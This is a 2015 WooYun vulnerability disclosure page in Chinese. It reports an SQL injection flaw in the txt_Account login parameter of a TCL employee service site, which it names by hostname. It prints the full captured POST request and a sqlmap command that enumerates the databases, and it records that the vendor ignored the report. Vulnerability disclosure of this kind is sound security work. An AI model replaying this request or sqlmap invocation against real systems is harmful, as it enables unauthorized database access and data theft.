当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093081

漏洞标题:TCL某网站存在SQL注入漏洞

相关厂商:TCL官方网上商城

漏洞作者: 深度安全实验室

提交时间:2015-01-22 11:13

修复时间:2015-01-27 11:14

公开时间:2015-01-27 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-22: 细节已通知厂商并且等待厂商处理中
2015-01-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

TCL员工移动服务平台

http://scm.tmt.tcl.com/


存在SQL注入漏洞。出现问题的地方:

POST /login.aspx HTTP/1.1
Host: scm.tmt.tcl.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://scm.tmt.tcl.com/
Cookie: pgv_pvi=5829222400
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 353
__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE1ODQwNDk5NTlkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQRnb2luBQVyZXNldOlmGxBjLTVG%2FLPYqsVkeRIFPEj3&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBQLryrKoCgKf9trPBwKS5MT8AgKGlJHHBALDkZWMBs7e3somCRkLZ%2FBrdwfsQHx%2FvipO&txt_Account=1&Txt_PassWord=1&goin.x=47&goin.y=12


txt_Account参数有问题。

漏洞证明:

sqlmap.py -r ../sql.txt -p "txt_Account" --dbs --no-cast


1.jpg

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-27 11:14

厂商回复:

最新状态:

暂无


漏洞评价:

评论